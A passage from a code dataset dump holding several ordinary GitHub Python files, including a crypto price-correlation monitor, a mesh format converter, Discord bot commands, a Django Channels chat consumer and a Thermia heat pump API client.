race_log_list\n\n\ndef build_report(data_folder_path: str, order=\"asc\", driver=None):\n assert type(data_folder_path) == str\n assert type(order) == str\n assert order in (\"asc\", \"desc\")\n assert driver is None or type(driver) == str\n assert os.path.exists(data_folder_path)\n\n log = make_log(data_folder_path)\n make_error_log_file(log)\n log = delete_log_notes_with_error(log)\n formatted_log = format_report(log)\n if driver:\n report = make_one_racer_info(driver, formatted_log)\n assert type(report) == str\n else:\n report = sorted_log(formatted_log, order)\n assert type(report) == list\n return report, driver\n\n\ndef print_report(report_data_set: tuple):\n assert type(report_data_set) == tuple\n\n report, driver = report_data_set\n\n if driver:\n print(report)\n else:\n for i in report:\n print(i)\n print_error_log(error_log_path)\n","repo_name":"Seyon7/report","sub_path":"modules/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":8231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70319461371","text":"import aiohttp\nimport asyncio\n\nfrom config import ETHUSDT_URL, BTCUSDT_URL, INTERVAL_DELAY, RETRY_DELAY\nfrom utils import get_price, calculate_correlation\n\n\nasync def main():\n\n # Initialize the previous prices of both pairs to a high number\n last_eth_price = last_btc_price = 10000\n\n # Initialize empty lists to save the prices of both pairs\n eth_prices = []\n btc_prices = []\n\n while True:\n try:\n async with aiohttp.ClientSession() as session:\n eth_response = await get_price(session, ETHUSDT_URL)\n print(eth_response)\n btc_response = await get_price(session, BTCUSDT_URL)\n print(btc_response)\n\n # Parse the price from the response and append it to the list.\n current_eth_price = float(eth_response['price'])\n eth_prices.append(current_eth_price)\n print(eth_prices)\n\n current_btc_price = float(btc_response['price'])\n btc_prices.append(current_btc_price)\n print(btc_prices)\n\n # If there are more than 60 prices in the list (we have more than 1 hour of data)\n if len(eth_prices) > 60 and len(btc_prices) > 60:\n\n # Calculate the percentage change in price over the last hour\n eth_price_change = (current_eth_price - last_eth_price) / last_eth_price\n btc_price_change = (current_btc_price - last_btc_price) / last_btc_price\n\n # Calculate the correlation between the two sets of prices\n correlation = calculate_correlation(eth_prices, btc_prices)\n print(correlation)\n\n # the ETH price change by the correlation with the BTC price change.\n no_btc_eth_change = eth_price_change - correlation * btc_price_change\n print(no_btc_eth_change)\n\n # if the total price change is more than 1%, print a message.\n if no_btc_eth_change > 0.01:\n print(\n f\"The price of ETHUSDT has increased by 1% in the last hour. Current price:: {current_eth_price}\")\n elif no_btc_eth_change < -0.01:\n print(\n f\"The price of ETHUSDT has decreased by 1% in the last hour. Current price: {current_eth_price}\")\n\n last_eth_price = current_eth_price\n last_btc_price = current_btc_price\n\n await asyncio.sleep(INTERVAL_DELAY)\n\n except Exception as e:\n print(f\"A '{e}' error has occurred\")\n await asyncio.sleep(RETRY_DELAY)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"Shved15/SP-Shcherbin-test-task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21057857360","text":"import trimesh\nimport glob\nimport slam.io as sio\n\n\"\"\"\n © Aix Marseille University - LIS-CNRS UMR 7020\n Author(s): Karim Makki, Amine Bohi (karim.makki,amine.bohi{@univ-amu.fr})\n This software is governed by the CeCILL-B license under French law and\n abiding by the rules of distribution of free software. You can use,\n modify and/ or redistribute the software under the terms of the CeCILL-B\n license as circulated by CEA, CNRS and INRIA at the following URL\n \"http://www.cecill.info\".\n As a counterpart to the access to the source code and rights to copy,\n modify and redistribute granted by the license, users are provided only\n with a limited warranty and the software's author, the holder of the\n economic rights, and the successive licensors have only limited\n liability.\n In this respect, the user's attention is drawn to the risks associated\n with loading, using, modifying and/or developing or reproducing the\n software by the user in light of its specific status of free software,\n that may mean that it is complicated to manipulate, and that also\n therefore means that it is reserved for developers and experienced\n professionals having in-depth computer knowledge. Users are therefore\n encouraged to load and test the software's suitability as regards their\n requirements in conditions enabling the security of their systems and/or\n data to be ensured and, more generally, to use and operate it in the\n same conditions as regards security.\n The fact that you are presently reading this means that you have had\n knowledge of the CeCILL-B license and that you accept its terms.\n\"\"\"\n\n\n#--------------------------------------------------------------------\n# quadrilateral to triangular mesh Converter\n#\n\n\nresult_path = '../Data/MESH_DATA/trimesh_gifti_all/'\npath = '../Data/MESH_DATA/mesh_gifti_all/TV_Dyn3D_5SL/'\nbasename = 'output_TV_Dyn3D_5SL_3dRecbyReg'\nmesh_set = glob.glob(path+basename+'*.gii')\nmesh_set.sort()\n\nprint(len(mesh_set))\n\nfor t in range(0,len(mesh_set)):\n\n print(t)\n\n prefix = mesh_set[t].split('/')[-1].split('.')[0]\n\n print(prefix)\n\n gifti_file = result_path+prefix+'.gii'\n\n print(gifti_file)\n mesh = sio.load_mesh(mesh_set[t])\n #mesh = trimesh.load_mesh(mesh_set[t])\n sio.write_mesh(mesh, gifti_file)\n\n","repo_name":"k16makki/dynPelvis","sub_path":"Dynpelvis3D/4D_Quad_Mesh_Reconstruction/quad2tri.py","file_name":"quad2tri.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33123599427","text":"import discord\nimport json\n\nfrom discord.ext import commands\nfrom discord.ext.commands import has_permissions\n\n# ------------------------ COGS ------------------------ # \n\nclass RemovePreviousRewardsCog(commands.Cog, name=\"removePreviousRewards command\"):\n def __init__(self, bot):\n self.bot = bot\n\n# ------------------------------------------------------ # \n\n @commands.command(name = 'removepreviousrewards', aliases = [\"rpr\", \"settings\"])\n @has_permissions(administrator = True)\n async def rolerewards (self, ctx, trueOrFalse):\n\n # Read json file\n with open(\"configuration.json\", \"r\") as configFile:\n data = json.load(configFile)\n \n trueOrFalse = trueOrFalse.lower()\n if trueOrFalse == \"false\":\n data[\"removePreviousRewards\"] = False\n elif trueOrFalse == \"true\":\n data[\"removePreviousRewards\"] = True \n else:\n embed = discord.Embed(title=f\"**ERROR**\", description=f\"The removePreviousRewards setting must be true or false\\nFollow the example : ``{self.bot.command_prefix}removePreviousRewards ``\", color=0xe00000) # Red\n embed.set_footer(text=\"Bot Created by Darkempire#8245\")\n return await ctx.channel.send(embed=embed)\n\n # Write in the json file\n newdata = json.dumps(data, indent=4, ensure_ascii=False)\n with open(\"configuration.json\", \"w\") as configFile:\n configFile.write(newdata)\n\n embed = discord.Embed(title=f\"**SETTINGS :**\", description=f\"RemovePreviousRewards setting has been modified.\", color=0x1eb823) # Green\n embed.set_footer(text=\"Bot Created by Darkempire#8245\")\n await ctx.channel.send(embed=embed)\n\n# ------------------------ BOT ------------------------ # \n\ndef setup(bot):\n bot.add_cog(RemovePreviousRewardsCog(bot))","repo_name":"Darkempire78/Mee6-Bypasser","sub_path":"Cogs/removePreviousRewards.py","file_name":"removePreviousRewards.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"78"} +{"seq_id":"74959205692","text":"import os\nimport json\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"config.settings\")\ndjango.setup()\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer, AsyncWebsocketConsumer\nfrom .serializers import Messageserializer\nfrom .models import Message, Chat\nfrom rest_framework.renderers import JSONRenderer\nfrom django.contrib.auth import get_user_model\n\nuser = get_user_model()\n\n\nclass ChatConsumer(WebsocketConsumer):\n\n def new_message(self, data):\n print('new_message')\n message = data['message']\n author = data.get(\"username\", None)\n room_name = data.get('room_name', None)\n self.notif(data)\n chat_model = Chat.objects.get(room_name=room_name)\n print('author', author)\n user_model = user.objects.filter(username=author).last()\n print('user_model', user_model)\n message_model = Message.objects.create(author=user_model, content=message, related_chat=chat_model)\n print(message_model)\n result = eval(self.message_serializer(message_model))\n self.send_to_chat_message(result)\n\n def notif(self, data):\n print(\"start notif\")\n message_room_name = data['room_name']\n chat_room_qs = Chat.objects.filter(room_name=message_room_name)\n members_list = []\n for _ in chat_room_qs[0].members.all():\n members_list.append(_.username)\n\n async_to_sync(self.channel_layer.group_send)(\n 'chat_listener',\n {\n 'type': 'chat_message',\n 'content': data['message'],\n '__str__': data['username'],\n 'room_name': message_room_name,\n 'members_list': members_list,\n }\n )\n\n\n\n def fetch_message(self, data):\n print('fetch_message')\n room_name = data['room_name']\n print('room_name', room_name)\n qs = Message.last_message(self, room_name)\n message_json = self.message_serializer(qs)\n content = {\n \"message\": eval(message_json),\n \"command\": \"fetch_message\",\n }\n\n self.chat_message(content)\n\n def image(self, data):\n self.send_to_chat_message(data)\n\n def message_serializer(self, qs):\n serialized = Messageserializer(qs,\n many=(lambda qs: True if (qs.__class__.__name__ == 'QuerySet') else False)(qs))\n content = JSONRenderer().render(serialized.data)\n return content\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = f\"chat_{self.room_name}\"\n\n async_to_sync(self.channel_layer.group_add)(self.room_group_name, self.channel_name)\n\n self.accept()\n\n commands = {\n \"new_message\": new_message,\n \"fetch_message\": fetch_message,\n \"img\": image,\n }\n\n def disconnect(self, close_code):\n async_to_sync(self.channel_layer.group_discard)(self.room_group_name, self.channel_name)\n\n def receive(self, text_data=None, bytes_data=None):\n text_data_dict = json.loads(text_data)\n # print(\"text_data_dict\", text_data_dict)\n\n command = text_data_dict['command']\n self.commands[command](self, text_data_dict)\n\n def send_to_chat_message(self, message):\n command = message.get(\"command\", None)\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'content': message['content'],\n 'command': (lambda command: \"img\" if (command == \"img\") else \"new_message\")(command),\n '__str__': message['__str__']\n }\n )\n\n def chat_message(self, event):\n print(event)\n self.send(text_data=json.dumps(event))\n\n# Synchronous Consumer:\n\n# class ChatConsumer(WebsocketConsumer):\n#\n# def connect(self):\n# self.room_name = self.scope['url_route']['kwargs']['room_name']\n# self.room_group_name = f\"chat_{self.room_name}\"\n#\n# async_to_sync(self.channel_layer.group_add)(self.room_group_name, self.channel_name)\n#\n# self.accept()\n#\n# def disconnect(self, close_code):\n# async_to_sync(self.channel_layer.group_discard)(self.room_group_name, self.channel_name)\n#\n# def receive(self, text_data=None, bytes_data=None):\n# text_data_dict = json.loads(text_data)\n# message = text_data_dict['message']\n#\n# async_to_sync(self.channel_layer.group_send)(\n# self.room_group_name,\n# {\n# 'type': 'chat_message',\n# 'message': message,\n# }\n# )\n#\n# def chat_message(self, event):\n# message = event['message']\n# self.send(text_data=json.dumps({\n# 'message': message\n# }))\n\n\n# ASynchronous Consumer:\n# class ChatConsumer(AsyncWebsocketConsumer):\n#\n# async def connect(self):\n# self.room_name = self.scope['url_route']['kwargs']['room_name']\n# self.room_group_name = f\"chat_{self.room_name}\"\n#\n# await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n#\n# await self.accept()\n#\n# async def disconnect(self, close_code):\n# await self.channel_layer.group_discard(self.room_group_name, self.channel_name)\n#\n# async def receive(self, text_data=None, bytes_data=None):\n# text_data_dict = json.loads(text_data)\n# message = text_data_dict['message']\n#\n# await self.channel_layer.group_send(\n# self.room_group_name,\n# {\n# 'type': 'chat_message',\n# 'message': message,\n# }\n# )\n#\n# async def chat_message(self, event):\n# message = event['message']\n# await self.send(text_data=json.dumps({\n# 'message': message\n# }))\n","repo_name":"MehdiShad/MiniChat","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18812735002","text":"from datetime import datetime\nimport json\nimport logging\nimport sys\nfrom ..utils.utils import pretty_print_except\n\nfrom typing import TYPE_CHECKING\n\nfrom ThermiaOnlineAPI.const import (\n OPERATIONAL_TIME_REGISTERS,\n REG_BRINE_IN,\n REG_BRINE_OUT,\n REG_ACTUAL_POOL_TEMP,\n REG_COOL_SENSOR_SUPPLY,\n REG_COOL_SENSOR_TANK,\n REG_DESIRED_SUPPLY_LINE,\n REG_DESIRED_SUPPLY_LINE_TEMP,\n REG_DESIRED_SYS_SUPPLY_LINE_TEMP,\n REG_OPER_DATA_RETURN,\n REG_OPER_DATA_SUPPLY_MA_SA,\n REG_OPER_TIME_COMPRESSOR,\n REG_OPER_TIME_HOT_WATER,\n REG_OPER_TIME_IMM1,\n REG_OPER_TIME_IMM2,\n REG_OPER_TIME_IMM3,\n REG_RETURN_LINE,\n REG_SUPPLY_LINE,\n TEMPERATURE_REGISTERS,\n DATETIME_FORMAT,\n)\n\nfrom ..utils.utils import get_dict_value_safe\n\nif TYPE_CHECKING:\n from ..api.ThermiaAPI import ThermiaAPI\n\nDEFAULT_REGISTER_INDEXES = {\n \"temperature\": None,\n \"operation_mode\": None,\n \"hot_water_switch\": None,\n}\n\n\nclass ThermiaHeatPump:\n def __init__(self, device_data: json, api_interface: \"ThermiaAPI\"):\n self.__device_id = str(device_data[\"id\"])\n self.__api_interface = api_interface\n\n self._LOGGER = logging.getLogger(__name__ + \".\" + self.__device_id)\n\n self.__info = None\n self.__status = None\n self.__device_data = None\n\n # GROUPS\n self.__group_temperatures = None\n self.__group_operational_status = None\n self.__group_operational_time = None\n self.__group_operational_operation = None\n self.__group_hot_water = None\n\n self.__alarms = None\n self.__historical_data_registers_map = None\n\n self.__register_indexes = DEFAULT_REGISTER_INDEXES\n\n self.update_data()\n\n def update_data(self):\n self.__info = self.__api_interface.get_device_info(self.__device_id)\n self.__status = self.__api_interface.get_device_status(\n self.__device_id)\n self.__device_data = self.__api_interface.get_device_by_id(\n self.__device_id)\n\n self.__register_indexes[\"temperature\"] = self.__status.get(\n \"heatingEffectRegisters\", [None, None]\n )[1]\n\n self.__group_temperatures = self.__api_interface.get__group_temperatures(\n self.__device_id\n )\n self.__group_operational_status = (\n self.__api_interface.get__group_operational_status(\n self.__device_id)\n )\n self.__group_operational_time = (\n self.__api_interface.get__group_operational_time(self.__device_id)\n )\n self.__group_operational_operation = (\n self.__api_interface.get_group_operational_operation(self)\n )\n self.__group_hot_water = self.__api_interface.get_group_hot_water(self)\n\n self.__alarms = self.__api_interface.get_all_alarms(self.__device_id)\n\n def get_register_indexes(self):\n return self.__register_indexes\n\n def set_register_index_operation_mode(self, register_index: int):\n self.__register_indexes[\"operation_mode\"] = register_index\n\n def set_register_index_hot_water_switch(self, register_index: int):\n self.__register_indexes[\"hot_water_switch\"] = register_index\n\n def set_temperature(self, temperature: int):\n self._LOGGER.info(\"Setting temperature to \" + str(temperature))\n self.__status[\n \"heatingEffect\"\n ] = temperature # update local state before refetching data\n self.__api_interface.set_temperature(self, temperature)\n self.update_data()\n\n def set_operation_mode(self, mode: str):\n self._LOGGER.info(\"Setting operation mode to \" + str(mode))\n\n self.__group_operational_operation[\n \"current\"\n ] = mode # update local state before refetching data\n self.__api_interface.set_operation_mode(self, mode)\n self.update_data()\n\n def set_hot_water_switch_state(self, state: int):\n self._LOGGER.info(\"Setting hot water switch to \" + str(state))\n\n if self.__group_hot_water is None:\n self._LOGGER.error(\"Hot water switch not available\")\n return\n\n self.__group_hot_water = state # update local state before refetching data\n self.__api_interface.set_hot_water_switch_state(self, state)\n self.update_data()\n\n def __get_heat_temperature_data(self):\n device_temperature_register_index = self.get_register_indexes()[\n \"temperature\"]\n if device_temperature_register_index is None:\n return None\n\n if self.__group_temperatures is None:\n return None\n\n data = [\n d\n for d in self.__group_temperatures\n if d[\"registerIndex\"] == device_temperature_register_index\n ]\n\n if len(data) != 1:\n # Temperature status not supported\n return None\n\n data = data[0]\n\n return {\n \"minValue\": data[\"minValue\"],\n \"maxValue\": data[\"maxValue\"],\n \"step\": data[\"step\"],\n }\n\n def __get_temperature_data_by_register_name(\n self, register_name: TEMPERATURE_REGISTERS\n ):\n return self.__get_data_from_group_by_register_name(\n self.__group_temperatures, register_name\n )\n\n def __get_operational_time_data_by_register_name(\n self, register_name: OPERATIONAL_TIME_REGISTERS\n ):\n return self.__get_data_from_group_by_register_name(\n self.__group_operational_time, register_name\n )\n\n def __get_data_from_group_by_register_name(self, group, register_name: str):\n if group is None:\n return None\n\n data = [d for d in group if d[\"registerName\"] == register_name]\n\n if len(data) != 1:\n # Temperature status not supported\n return None\n\n data = data[0]\n\n return {\n \"minValue\": data[\"minValue\"],\n \"maxValue\": data[\"maxValue\"],\n \"step\": data[\"step\"],\n \"value\": data[\"registerValue\"],\n }\n\n def __get_active_alarms(self):\n active_alarms = filter(\n lambda alarm: alarm.get(\n \"isActiveAlarm\", False) is True, self.__alarms\n )\n return list(active_alarms)\n\n def __set_historical_data_registers(self):\n data = self.__api_interface.get_historical_data_registers(\n self.__device_id)\n\n data_map = {}\n\n if data is not None and data.get(\"registers\") is not None:\n registers = data[\"registers\"]\n\n for register in registers:\n data_map[register[\"registerName\"]] = register[\"registerId\"]\n\n self.__historical_data_registers_map = data_map\n\n @property\n def name(self):\n return self.__info.get(\"name\")\n\n @property\n def id(self):\n return self.__device_id\n\n @property\n def is_online(self):\n return self.__info.get(\"isOnline\")\n\n @property\n def last_online(self):\n return self.__info.get(\"lastOnline\")\n\n @property\n def model(self):\n return self.__device_data.get(\"profile\", {}).get(\"thermiaName\")\n\n @property\n def has_indoor_temp_sensor(self):\n return self.__status.get(\"hasIndoorTempSensor\")\n\n @property\n def indoor_temperature(self):\n if self.has_indoor_temp_sensor:\n return self.__status.get(\"indoorTemperature\")\n else:\n return self.heat_temperature\n\n @property\n def is_outdoor_temp_sensor_functioning(self):\n return self.__status.get(\"isOutdoorTempSensorFunctioning\")\n\n @property\n def outdoor_temperature(self):\n return self.__status.get(\"outdoorTemperature\")\n\n @property\n def is_hot_water_active(self):\n return self.__status.get(\"isHotwaterActive\") or self.__status.get(\n \"isHotWaterActive\"\n )\n\n @property\n def hot_water_temperature(self):\n return self.__status.get(\"hotWaterTemperature\")\n\n ###########################################################################\n # Heat temperature data\n ###########################################################################\n\n @property\n def heat_temperature(self):\n return self.__status.get(\"heatingEffect\")\n\n @property\n def heat_min_temperature_value(self):\n return get_dict_value_safe(self.__get_heat_temperature_data(), \"minValue\")\n\n @property\n def heat_max_temperature_value(self):\n return get_dict_value_safe(self.__get_heat_temperature_data(), \"maxValue\")\n\n @property\n def heat_temperature_step(self):\n return get_dict_value_safe(self.__get_heat_temperature_data(), \"step\")\n\n ###########################################################################\n # Other temperature data\n ###########################################################################\n\n @property\n def supply_line_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_SUPPLY_LINE), \"value\"\n ) or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_OPER_DATA_SUPPLY_MA_SA),\n \"value\",\n )\n\n @property\n def desired_supply_line_temperature(self):\n return (\n get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_DESIRED_SUPPLY_LINE),\n \"value\",\n )\n or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_DESIRED_SUPPLY_LINE_TEMP\n ),\n \"value\",\n )\n or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_DESIRED_SYS_SUPPLY_LINE_TEMP\n ),\n \"value\",\n )\n )\n\n @property\n def return_line_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_RETURN_LINE), \"value\"\n ) or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_OPER_DATA_RETURN), \"value\"\n )\n\n @property\n def brine_out_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_BRINE_OUT), \"value\"\n )\n\n @property\n def pool_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_ACTUAL_POOL_TEMP), \"value\"\n )\n \n @property\n def brine_in_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(REG_BRINE_IN), \"value\"\n )\n\n @property\n def cooling_tank_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_COOL_SENSOR_TANK), \"value\"\n )\n\n @property\n def cooling_supply_line_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_COOL_SENSOR_SUPPLY),\n \"value\",\n )\n\n ###########################################################################\n # Operational status data\n ###########################################################################\n\n @property\n def operational_status(self):\n return get_dict_value_safe(self.__group_operational_status, \"current\")\n\n @property\n def available_operational_statuses(self):\n return list(\n get_dict_value_safe(\n self.__group_operational_status, \"available\", {}\n ).values()\n )\n\n @property\n def available_operational_statuses_map(self):\n return get_dict_value_safe(self.__group_operational_status, \"available\", {})\n\n ###########################################################################\n # Operational time data\n ###########################################################################\n\n @property\n def compressor_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_COMPRESSOR),\n \"value\",\n )\n\n @property\n def hot_water_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_HOT_WATER),\n \"value\",\n )\n\n @property\n def auxiliary_heater_1_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_IMM1),\n \"value\",\n )\n\n @property\n def auxiliary_heater_2_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_IMM2),\n \"value\",\n )\n\n @property\n def auxiliary_heater_3_operational_time(self):\n return get_dict_value_safe(\n self.__get_operational_time_data_by_register_name(\n REG_OPER_TIME_IMM3),\n \"value\",\n )\n\n ###########################################################################\n # Operation mode data\n ###########################################################################\n\n @property\n def operation_mode(self):\n return get_dict_value_safe(self.__group_operational_operation, \"current\")\n\n @property\n def available_operation_modes(self):\n return list(\n get_dict_value_safe(\n self.__group_operational_operation, \"available\", {}\n ).values()\n )\n\n @property\n def available_operation_mode_map(self):\n return get_dict_value_safe(self.__group_operational_operation, \"available\", {})\n\n @property\n def is_operation_mode_read_only(self):\n return get_dict_value_safe(self.__group_operational_operation, \"isReadOnly\")\n\n ###########################################################################\n # Hot water switch data\n ###########################################################################\n\n @property\n def is_hot_water_switch_available(self):\n return self.__group_hot_water is not None\n\n @property\n def hot_water_switch_state(self):\n return self.__group_hot_water\n\n ###########################################################################\n # Alarm data\n ###########################################################################\n\n @property\n def active_alarm_count(self):\n active_alarms = self.__get_active_alarms()\n return len(list(active_alarms))\n\n @property\n def active_alarms(self):\n active_alarms = self.__get_active_alarms()\n active_alarm_texts = map(\n lambda alarm: alarm.get(\"eventTitle\"), active_alarms)\n return list(active_alarm_texts)\n\n ###########################################################################\n # Historical data\n ###########################################################################\n\n @property\n def historical_data_registers(self):\n if self.__historical_data_registers_map is None:\n self.__set_historical_data_registers()\n\n return list(self.__historical_data_registers_map.keys())\n\n def get_historical_data_for_register(\n self, register_name, start_date: datetime, end_date: datetime\n ):\n if self.__historical_data_registers_map is None:\n self.__set_historical_data_registers()\n\n register_id = self.__historical_data_registers_map.get(register_name)\n\n if register_id is None:\n self._LOGGER.error(\n \"Register name is not supported: \" + str(register_name))\n return None\n\n historical_data = self.__api_interface.get_historical_data(\n self.__device_id,\n register_id,\n start_date.strftime(DATETIME_FORMAT),\n end_date.strftime(DATETIME_FORMAT),\n )\n\n if historical_data is None or historical_data.get(\"data\") is None:\n return []\n\n return list(\n map(\n lambda entry: {\n \"time\": datetime.strptime(\n entry[\"at\"].split(\".\")[0], DATETIME_FORMAT\n ),\n \"value\": int(entry[\"val\"]),\n },\n historical_data[\"data\"],\n )\n )\n\n ###########################################################################\n # Print debug data\n ###########################################################################\n\n def debug(self):\n print(\"Creating debug file\")\n\n original_stdout = sys.stdout\n f = open(\"debug.txt\", \"w\")\n sys.stdout = f\n\n print(\"########## DEBUG START ##########\")\n\n print(\"self.__info:\")\n pretty_print_except(self.__info, [\"address\", \"macAddress\", \"ownerId\",\n \"retailerAccess\", \"retailerId\", \"timeZoneId\", \"id\", \"hasUserAccount\"])\n\n print(\"self.__status:\")\n pretty_print_except(self.__status)\n\n print(\"self.__device_data:\")\n pretty_print_except(self.__device_data, [\n \"macAddress\", \"owner\", \"retailerAccess\", \"retailerId\", \"id\", \"status\"])\n\n print(\"self.__group_temperatures:\")\n pretty_print_except(self.__group_temperatures)\n\n installation_profile_id = self.__info.get(\"installationProfileId\")\n\n if installation_profile_id is not None:\n all_available_groups = self.__api_interface.get_all_available_groups(\n installation_profile_id)\n if all_available_groups is not None:\n print(\"All available groups:\")\n pretty_print_except(all_available_groups)\n\n for group in all_available_groups:\n group_name = group.get(\"name\")\n if group_name is not None:\n print(\"Group \" + group_name + \":\")\n group_data = self.__api_interface.get_register_group_json(\n self.__device_id, group_name)\n pretty_print_except(group_data)\n\n print(\"########## DEBUG END ##########\")\n\n sys.stdout = original_stdout\n f.close()\n print(\"Debug file created\")\n","repo_name":"LeoThorsell/python-thermia-online-api","sub_path":"ThermiaOnlineAPI/model/HeatPump.py","file_name":"HeatPump.py","file_ext":"py","file_size_in_byte":18439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"5200740381","text":"import interactions, utils, json\n\nSUGGESTIONS_FILE = \"commands/suggestions.json\"\n\nwith open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\nsuggestion_choices = []\n\nfor i in suggestions:\n suggestion_choices.append(interactions.Choice(name = i[\"title\"], value = i[\"title\"]))\n\ndel suggestions\n\nsuggestion_statuses = [\"New\", \"In progress\", \"Closed\"]\nsuggestion_status_choices = []\nfor i in suggestion_statuses:\n suggestion_status_choices.append(interactions.Choice(name = i, value = i))\n\nclass SuggestionCommands (interactions.Extension):\n def __init(self, client):\n self.client = client\n\n async def status (self, ctx : interactions.CommandContext, kwargs):\n if ctx.author.user.id != utils.ids.XOROL:\n await ctx.send(\"You're not Xorol, only he can use this command!\", ephemeral = True)\n return\n\n title = kwargs[\"suggestion\"]\n new_status = kwargs[\"status\"]\n\n with open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\n found = False\n for i, j in enumerate(suggestions):\n if j[\"title\"] == title:\n j[\"status\"] = new_status\n suggestions[i] = j\n found = True\n break\n\n if not found:\n await ctx.send(\"You somehow picked a suggestion that doesn't exist...\")\n return\n\n del found\n\n with open(SUGGESTIONS_FILE, \"w\") as f:\n json.dump(suggestions, f)\n\n await ctx.send(f\"{title}'s status has now been updated to {new_status}!\", ephemeral = True)\n\n async def suggest (self, ctx : interactions.CommandContext, kwargs):\n title = kwargs[\"title\"]\n reserved_names = [\"all\", \"View all suggestions\"]\n if title in reserved_names:\n await ctx.send(f\"Sorry, '{title}' is a reserved title, used for differentiating suggestions from the 'View all suggestions' option in the `/suggestion view` command\")\n return\n \n desc = kwargs[\"description\"]\n author = ctx.author.user\n\n with open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\n suggestions.append({\n \"title\":title,\n \"description\":desc,\n \"author\":int(author.id),\n \"status\":\"New\"\n })\n\n with open(SUGGESTIONS_FILE, \"w\") as f:\n json.dump(suggestions, f)\n\n await ctx.send(\"Your suggestion has been saved!\")\n\n async def view (self, ctx : interactions.CommandContext, kwargs):\n with open(SUGGESTIONS_FILE, \"r\") as f:\n suggestions = json.load(f)\n\n suggestion = kwargs[\"suggestion\"]\n\n if suggestion == \"all\":\n if len(suggestions) == 0:\n await ctx.send(\"There are no suggestions. You can fix that by suggesting something!\")\n return\n \n out = \"Here's all current suggestions!\"\n for i in suggestions:\n out += \"\\n> \" + i[\"title\"]\n\n await ctx.send(out)\n return\n\n found = False\n for i, j in enumerate(suggestions):\n if j[\"title\"] == suggestion:\n suggestion = j\n found = True\n break\n\n if not found:\n await ctx.send(\"You somehow picked a suggestion that doesn't exist...\")\n return\n\n del found\n\n author = await utils.bot.get_user(suggestion[\"author\"], self.client)\n\n embedi = interactions.Embed(\n title = j[\"title\"],\n description = j[\"description\"],\n fields = [\n interactions.EmbedField(name = \"Suggested by\", value = author.username),\n interactions.EmbedField(name = \"Status\", value = suggestion[\"status\"])\n ]\n )\n await ctx.send(embeds = embedi)\n\n @interactions.extension_command(\n name = \"suggestion\",\n description = \"secret desc lol\",\n scope = utils.ids.KOILANG,\n options = [\n interactions.Option(\n name = \"suggest\",\n description = \"Suggest something to be added to Rushk!\",\n type = interactions.OptionType.SUB_COMMAND,\n options = [\n interactions.Option(\n name = \"title\",\n description = \"The title of your suggestion\",\n type = interactions.OptionType.STRING,\n required = True\n ),\n interactions.Option(\n name = \"description\",\n description = \"The description of your suggestion\",\n type = interactions.OptionType.STRING,\n required = True\n )\n ]\n ),\n interactions.Option(\n name = \"set_status\",\n description = \"Updates the status of a suggestion\",\n type = interactions.OptionType.SUB_COMMAND,\n options = [\n interactions.Option(\n name = \"suggestion\",\n description = \"The suggestion to update the status of\",\n type = interactions.OptionType.STRING,\n required = True,\n choices = suggestion_choices\n ),\n interactions.Option(\n name = \"status\",\n description = \"The new status\",\n type = interactions.OptionType.STRING,\n required = True, \n choices = suggestion_status_choices\n )\n ]\n ),\n interactions.Option(\n name = \"view\",\n description = \"See one or all suggestions currently submitted!\",\n type = interactions.OptionType.SUB_COMMAND,\n options = [\n interactions.Option(\n name = \"suggestion\",\n description = \"The suggestion to view\",\n type = interactions.OptionType.STRING,\n required = True,\n choices = suggestion_choices + [interactions.Choice(name=\"View all suggestions\", value = \"all\")]\n )\n ]\n )\n ]\n )\n async def suggestion_master_command (self, ctx : interactions.CommandContext, sub_command,**kwargs):\n if sub_command == \"suggest\":\n await self.suggest(ctx, kwargs)\n elif sub_command == \"set_status\":\n await self.status(ctx, kwargs)\n elif sub_command == \"view\":\n await self.view(ctx, kwargs)\n\ndef setup(client):\n 